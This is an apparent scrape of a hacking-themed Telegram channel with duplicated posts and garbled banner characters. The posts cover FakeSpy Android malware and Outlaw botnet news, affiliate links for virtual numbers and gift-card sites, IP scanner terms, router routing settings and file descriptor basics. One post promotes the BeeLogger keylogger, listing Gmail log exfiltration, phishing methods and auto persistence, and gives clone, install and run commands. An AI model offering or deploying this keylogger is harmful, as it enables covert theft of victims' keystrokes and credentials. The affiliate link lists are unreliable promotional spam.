β β β Uππ»βΊπ«6π¬πβ β β β
π¦Android malware named FakeSpy "reappears" after three years is more dangerous than before :
#News
> According to foreign media BGR reports, an Android malware called FakeSpy reproduces Jianghu, the current main target is users in the United States and Western Europe. The application can steal user text messages, bank information and application data. The malware was spread via a text message that appeared to come from a local post office, and instructed users to download an application disguised as a legitimate post office application.
> According to a new report from Cybereason, a dangerous Android malware called FakeSpy has reappeared. FakeSpy was first discovered by security researchers nearly three years ago. It is a particularly malicious malware designed to steal user text messages, financial data, bank login information, application data, contact lists, etc.
>In its initial incarnation, the app targets users in South Korea and Japan. Recently, however, this application has become more ambitious, and is now targeting users around the world. Currently, some countries targeted by the malware include China, France, Germany, the United Kingdom and the United States. It is reported that the current iteration of FakeSpy is also more powerful and complicated than the original version, which means that Android users should be particularly vigilant to avoid receiving suspicious information.
> FakeSpy's way of spreading is quite clever. The first is a text message claiming to be from a local post office. The text message claimed that the post office tried to deliver a package, but the user could not deliver it because the user was not at home. Then, it provides a link that the user can click, which leads the user to download an application disguised as a legitimate postal service application. Once installed on the device, the app will send fake text messages and malicious links to the user's entire contact list.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Android malware named FakeSpy "reappears" after three years is more dangerous than before :
#News
> According to foreign media BGR reports, an Android malware called FakeSpy reproduces Jianghu, the current main target is users in the United States and Western Europe. The application can steal user text messages, bank information and application data. The malware was spread via a text message that appeared to come from a local post office, and instructed users to download an application disguised as a legitimate post office application.
> According to a new report from Cybereason, a dangerous Android malware called FakeSpy has reappeared. FakeSpy was first discovered by security researchers nearly three years ago. It is a particularly malicious malware designed to steal user text messages, financial data, bank login information, application data, contact lists, etc.
>In its initial incarnation, the app targets users in South Korea and Japan. Recently, however, this application has become more ambitious, and is now targeting users around the world. Currently, some countries targeted by the malware include China, France, Germany, the United Kingdom and the United States. It is reported that the current iteration of FakeSpy is also more powerful and complicated than the original version, which means that Android users should be particularly vigilant to avoid receiving suspicious information.
> FakeSpy's way of spreading is quite clever. The first is a text message claiming to be from a local post office. The text message claimed that the post office tried to deliver a package, but the user could not deliver it because the user was not at home. Then, it provides a link that the user can click, which leads the user to download an application disguised as a legitimate postal service application. Once installed on the device, the app will send fake text messages and malicious links to the user's entire contact list.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Top 2020 Rated paid-free virtual number services for business only :
1οΈβ£Nextiva
https://www.nextiva.com/x20/aff44/?utm_source=CJ&utm_medium=ctable&utm_campaign=CJ&AID=10932738&PID=100126123&cjevent=c3adc3b9bf5e11ea82f102060a18050f
2οΈβ£for usa
https://voice.google.com/u/0/signup
(free)& great
3οΈβ£grass hopper
https://grasshopper.com/?clickid=VsRW1MwKexyOTg%3AwUx0Mo3EWUkiUrOVGeUFATg0&irgwc=1&utm_source=Impact&utm_medium=Affiliate&utm_campaign=503375
4οΈβ£callhopper
https://callhippo.com/?fp_ref=smallbizgenius
thereis many more but those are top rated
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Top 2020 Rated paid-free virtual number services for business only :
1οΈβ£Nextiva
https://www.nextiva.com/x20/aff44/?utm_source=CJ&utm_medium=ctable&utm_campaign=CJ&AID=10932738&PID=100126123&cjevent=c3adc3b9bf5e11ea82f102060a18050f
2οΈβ£for usa
https://voice.google.com/u/0/signup
(free)& great
3οΈβ£grass hopper
https://grasshopper.com/?clickid=VsRW1MwKexyOTg%3AwUx0Mo3EWUkiUrOVGeUFATg0&irgwc=1&utm_source=Impact&utm_medium=Affiliate&utm_campaign=503375
4οΈβ£callhopper
https://callhippo.com/?fp_ref=smallbizgenius
thereis many more but those are top rated
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Nextiva
Simple, Affordable VoIP Phone Service.
for more about free phone numbers 2020 checkout https://t.me/UnderCodeTesting/3115
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Random Key terms:
>Feeder - Source of IP addresses for scanning. Angry IP Scanner provides various scanning sources: IP Range, IP List File or Random. You can select a source from the drop-down list next to the "Start" button
>Data collector - collects specific information about the host, for example, ping time, host name, open ports. Collectors are usually columns as a result of a scan. They can be selected in the menu "Tools-> Data Collectors".
>Active host - the host responding to ping. The results sheet is marked in blue.
>Inactive host - a host that does not respond to ping (red). However, it may have open ports (if the firewall blocks ping). In order to fully scan such hosts, check the "Scan inactive" checkbox in Tools-> Preferences.
>Pinging (host check):
>ICMP echo is the standard method used by the 'ping' program. On most platforms, requires administrator privileges. Some firewalls prohibit response packets to an ICMP request, making active hosts look inactive.
>UDP - sends UDP packets (datagrams) to one of the host ports and monitors the response (whether or not). Not standard, but does not require privileges.
>TCP - trying to connect to the 80 (http) port. UDP may work better for some networks, usually not.
>Scanning UDP and TCP most often does not detect routers or other network equipment properly
> Open port - TCP port that responded to the connection attempt. Greens on the list.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Random Key terms:
>Feeder - Source of IP addresses for scanning. Angry IP Scanner provides various scanning sources: IP Range, IP List File or Random. You can select a source from the drop-down list next to the "Start" button
>Data collector - collects specific information about the host, for example, ping time, host name, open ports. Collectors are usually columns as a result of a scan. They can be selected in the menu "Tools-> Data Collectors".
>Active host - the host responding to ping. The results sheet is marked in blue.
>Inactive host - a host that does not respond to ping (red). However, it may have open ports (if the firewall blocks ping). In order to fully scan such hosts, check the "Scan inactive" checkbox in Tools-> Preferences.
>Pinging (host check):
>ICMP echo is the standard method used by the 'ping' program. On most platforms, requires administrator privileges. Some firewalls prohibit response packets to an ICMP request, making active hosts look inactive.
>UDP - sends UDP packets (datagrams) to one of the host ports and monitors the response (whether or not). Not standard, but does not require privileges.
>TCP - trying to connect to the 80 (http) port. UDP may work better for some networks, usually not.
>Scanning UDP and TCP most often does not detect routers or other network equipment properly
> Open port - TCP port that responded to the connection attempt. Greens on the list.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Malware Traffic Analysis Exercise (July 2019) .pdf
480.6 KB
Mlaware Traffic Analysis #Exercise
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Sites for gift Cards Top Rated in 2020 :
> https://grindabuck.com/
> https://grny.io/2FAC5BX
> https://www.instagc.com/1697927
>https://www.anrdoezrs.net/click-7068738-13997154/ref/a0sq8i
> https://go.wellkeptwallet.com/surveyjunkienew
> https://wellkeptwallet.com/get-paid-play-games-online/
> https://www.thewaystowealth.com/fetch
> https://www.thewaystowealth.com/ibotta (app)
> https://www.thewaystowealth.com/drop
> https://www.thewaystowealth.com/sba
> https://go.millennialmoney.com/inboxdollars/?pd00=30347&pd02=L2kDatx712dX
enjoyguys β€οΈπ
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Sites for gift Cards Top Rated in 2020 :
> https://grindabuck.com/
> https://grny.io/2FAC5BX
> https://www.instagc.com/1697927
>https://www.anrdoezrs.net/click-7068738-13997154/ref/a0sq8i
> https://go.wellkeptwallet.com/surveyjunkienew
> https://wellkeptwallet.com/get-paid-play-games-online/
> https://www.thewaystowealth.com/fetch
> https://www.thewaystowealth.com/ibotta (app)
> https://www.thewaystowealth.com/drop
> https://www.thewaystowealth.com/sba
> https://go.millennialmoney.com/inboxdollars/?pd00=30347&pd02=L2kDatx712dX
enjoyguys β€οΈπ
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Instagc
Instant Gift Cards
Get free gift cards by completing tasks, surveys, videos, plus more. Over 1,426,000+ gift cards redeemed. Free to join.
β β β Uππ»βΊπ«6π¬πβ β β β
π¦LINUX-tERMUX BEELOGGER
FEATURES:
>Send logs each 120 seconds.
>Send logs when chars > 50.
>Send logs with GMAIL.
>Some Phishing methods are included.
>Multiple Session disabled.
>Auto Persistence.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦LINUX-tERMUX BEELOGGER
FEATURES:
>Send logs each 120 seconds.
>Send logs when chars > 50.
>Send logs with GMAIL.
>Some Phishing methods are included.
>Multiple Session disabled.
>Auto Persistence.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£
git clone https://github.com/4w4k3/BeeLogger.git
Running:
2οΈβ£cd BeeLogger
3οΈβ£sudo su
4οΈβ£chmod +x install.sh
5οΈβ£./install.sh
6οΈβ£python bee.py
If you have another version of Python:
python2.7 bee.py
7οΈβ£choose options via numbersfor learn !
Use
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦ Outlaw botnet infects about 20,000 Linux servers, Tencent security reminds enterprises to remove in time
#news
>The parent file transmitted by this attack is dota3.tar.gz, which may be the third version of the Outlaw botnet. The parent file releases a shell script to start the corresponding binary program. kswapd0 is responsible for mining Monero, tsm32, tsm64 is responsible for continuing the SSH blast attack to spread the virus.
>The Outlaw botnet was previously distributed by exploiting the Shellshock vulnerability, so it was named "Shellbot". Shellbot uses common command injection vulnerabilities on Internet of Things (IoT) devices and Linux servers to infect. The Shellshock vulnerability (CVE-2014-7169) is a serious vulnerability discovered in the Bash command shell in 2014. Most Linux distributions usually use this feature, and attackers can remotely execute code on these affected Linux servers.
>Outlaw botnets use SSH to blast intrusive attacks, which can be detected
> Cloud Firewall can detect the mining behavior of Outlaw botnet, Shellshock exploit and brute force cracking of SSH login password and other attack activities.
At present, the impact of the Outlaw botnet is still spreading, causing serious harm to enterprise servers. Tencent security products have taken emergency response measures
@undercodeNews
β β β Uππ»βΊπ«6π¬πβ β β β
π¦ Outlaw botnet infects about 20,000 Linux servers, Tencent security reminds enterprises to remove in time
#news
>The parent file transmitted by this attack is dota3.tar.gz, which may be the third version of the Outlaw botnet. The parent file releases a shell script to start the corresponding binary program. kswapd0 is responsible for mining Monero, tsm32, tsm64 is responsible for continuing the SSH blast attack to spread the virus.
>The Outlaw botnet was previously distributed by exploiting the Shellshock vulnerability, so it was named "Shellbot". Shellbot uses common command injection vulnerabilities on Internet of Things (IoT) devices and Linux servers to infect. The Shellshock vulnerability (CVE-2014-7169) is a serious vulnerability discovered in the Bash command shell in 2014. Most Linux distributions usually use this feature, and attackers can remotely execute code on these affected Linux servers.
>Outlaw botnets use SSH to blast intrusive attacks, which can be detected
> Cloud Firewall can detect the mining behavior of Outlaw botnet, Shellshock exploit and brute force cracking of SSH login password and other attack activities.
At present, the impact of the Outlaw botnet is still spreading, causing serious harm to enterprise servers. Tencent security products have taken emergency response measures
@undercodeNews
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How do multiple WAN routers set the internal IP to correspond to the fixed WAN port? LAN IP address settings
How do multiple WAN routers set the intranet IP to correspond to a fixed WAN port? There are a lot of broadband, in order to ensure the network speed, I want to let some computers take the top route, so that the speed of the distribution network is very fast, we need to set the LAN IP address, let's take a look at the detailed tutorial, friends You can refer to
> When using multiple broadband, in order to ensure that some special computers have sufficient speed, we can let these computers take the designated route and separate from other computers. Next, let's operate how to set the specified LAN IP from the specified WAN port of the multi-WAN router.
1οΈβ£ First, set up an address group, and put the IPs to be specially processed into a group.
2οΈβ£ Open the " Routing Settings " in " Transmission Control "
3οΈβ£ into the " policy PBR list of rules ", click " Add"
4οΈβ£in the source address, select the IP address group to be set on the WAN2 port.
5οΈβ£ Select " WAN2" for the effective interface and let it go to the WAN2 port.
6οΈβ£Others can keep the default, click " OK" to save the settings
7οΈβ£Now you can go to test whether it has gone to the designated WAN port.
great! that's all
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦How do multiple WAN routers set the internal IP to correspond to the fixed WAN port? LAN IP address settings
How do multiple WAN routers set the intranet IP to correspond to a fixed WAN port? There are a lot of broadband, in order to ensure the network speed, I want to let some computers take the top route, so that the speed of the distribution network is very fast, we need to set the LAN IP address, let's take a look at the detailed tutorial, friends You can refer to
> When using multiple broadband, in order to ensure that some special computers have sufficient speed, we can let these computers take the designated route and separate from other computers. Next, let's operate how to set the specified LAN IP from the specified WAN port of the multi-WAN router.
1οΈβ£ First, set up an address group, and put the IPs to be specially processed into a group.
2οΈβ£ Open the " Routing Settings " in " Transmission Control "
3οΈβ£ into the " policy PBR list of rules ", click " Add"
4οΈβ£in the source address, select the IP address group to be set on the WAN2 port.
5οΈβ£ Select " WAN2" for the effective interface and let it go to the WAN2 port.
6οΈβ£Others can keep the default, click " OK" to save the settings
7οΈβ£Now you can go to test whether it has gone to the designated WAN port.
great! that's all
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ The difference between file descriptors and file pointers:
#fastTips
> File descriptor: Open the file in the linux system to get the file descriptor, which is a small positive integer. Each process stores a file descriptor table in the PCB (Process Control Block). The file descriptor is the index of this table, and each entry has a pointer to the opened file.
> File pointer: The file pointer is used as the handle of I/O in C language. The file pointer points to a data structure called the FILE structure in the process user area. The FILE structure includes a buffer and a file descriptor. The file descriptor is an index of the file descriptor table, so in a sense, the file pointer is the handle of the handle (on Windows systems, the file descriptor is called the file handle).
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ The difference between file descriptors and file pointers:
#fastTips
> File descriptor: Open the file in the linux system to get the file descriptor, which is a small positive integer. Each process stores a file descriptor table in the PCB (Process Control Block). The file descriptor is the index of this table, and each entry has a pointer to the opened file.
> File pointer: The file pointer is used as the handle of I/O in C language. The file pointer points to a data structure called the FILE structure in the process user area. The FILE structure includes a buffer and a file descriptor. The file descriptor is an index of the file descriptor table, so in a sense, the file pointer is the handle of the handle (on Windows systems, the file descriptor is called the file handle).
β β β Uππ»βΊπ«Δπ¬πβ β β β